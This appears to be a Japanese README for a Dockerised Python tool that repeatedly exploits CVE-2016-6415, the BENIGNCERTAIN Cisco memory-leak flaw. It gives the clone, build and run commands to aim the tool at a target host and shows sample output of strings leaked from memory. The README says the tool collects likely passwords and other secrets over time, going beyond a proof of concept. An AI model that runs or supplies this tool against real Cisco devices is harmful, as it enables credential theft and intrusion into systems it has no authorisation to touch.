
VirtueSecurityのbenigncertain-monitorの再実装
VirtueSecurityのbenigncertain-monitorの再実装。元のものと同じペイロードオプションはすべて含まれていませんが、bc-idバイナリをRoss Bradleyによるより優れた概念実証に置き換えており、必要に応じて拡張可能です。
$ git clone https://github.com/3ndG4me/CVE-2016-6415-BenignCertain-Monitor.git
$ cd CVE-2016-6415-BenignCertain-Monitor
$ sudo docker build . -t benign-monitor
$ sudo docker run -it benign-monitor <host>
このサービスは脆弱なサービスを継続的にポーリングし、メモリからASCII文字列を抽出し、ローカルのsqliteデータベースに保存し、最も頻繁に観測された文字列を表示します:
Starting monitor against 10.0.6.1
string count
0 5$dx 3
1 0(0 3
2 $c{l 3
3 (0"t&j 3
4 R$dkd$hf7! 2
5 %d1N=8$i- 2
6 $c)P0 1
7 1NlD 1
8 1NlD' 1
9 $c)P(0 1
10 $c)P1@_ 1
これは、NSAのBENIGNCERTAIN CiscoエクスプロイトCVE-2016-6415に対して脆弱なターゲットのメモリを継続的に漏洩させるDocker化されたPythonスクリプトです。
このスクリプトは時間をかけて脆弱なサービスをポーリングし、可能性のあるパスワードやその他の機密情報を特定します。これは、概念実証エクスプロイトに留まらず、一定期間にわたって実行可能なデータを収集するために使用できます。